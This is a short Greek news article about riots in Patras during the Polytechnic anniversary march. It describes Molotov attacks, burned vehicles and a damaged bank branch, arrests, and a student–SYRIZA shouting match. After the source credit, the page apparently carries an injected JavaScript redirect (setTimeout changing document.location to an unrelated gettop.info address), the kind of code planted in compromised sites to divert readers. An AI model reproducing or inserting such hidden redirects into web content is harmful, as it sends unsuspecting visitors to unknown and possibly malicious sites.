Έντονα επεισόδια και στην Πάτρα

0
10

 

 

Αντιεξουσιαστές επιτέθηκαν με πέτρες και μολότοφ. Έκαψαν ένα αυτοκίνητο κι ένα μηχανάκι στην Κολοκοτρώνη και Κορίνθου και το Ταχυδρομικό Ταμιευτήριο στην Κανακάρη. Οι αστυνομικοί προχώρησαν σε συλλήψεις και ανάγκασαν τους νεαρούς τραπούν σε φυγή προς την πλατεία Όλγας.

Νωρίτερα, άτομα του αντιεξουσιαστικού χώρου πετούσαν πέτρες και μολότοφ σε δημοσιογράφους και πολίτες! Πανικός επικράτησε στο κέντρο της πόλης με τους πολίτες να τρέχουν για να αποφύγουν την γενικευμένη επίθεση.

Προηγήθηκαν μολότοφ στο Αστυνομικό μέγαρο της Ερμού. Σύμφωνα με το Tempo24, η Αστυνομία είναι απούσα από τα επεισόδια σε ένα σημείο της πόλης, με μεγάλη κίνηση.
Οδοφράγματα με κάδους να φλέγονται έχουν στηθεί στην Κανακάρη. Ενώ έχουν προκληθεί σοβαρές ζημιές στο Ταχυδρομικό Ταμιευτήριο.

Λίγο μετά τις 20.00 άρχισαν να μπαίνουν άτομα με πέτρες στην πορεία για το Πολυτεχνείο που ξεκίνησε από το Παράρτημα στην οδό Κορίνθου στην Πάτρα.

Νωρίτερα, υπήρξε αντιπαράθεση μεταξύ φοιτητών και στελεχών του ΣΥΡΙΖΑ, με τις δύο πλευρές να φωνάζουν συνθήματα η μία στην άλλη.

Πηγή: Tempo24 setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here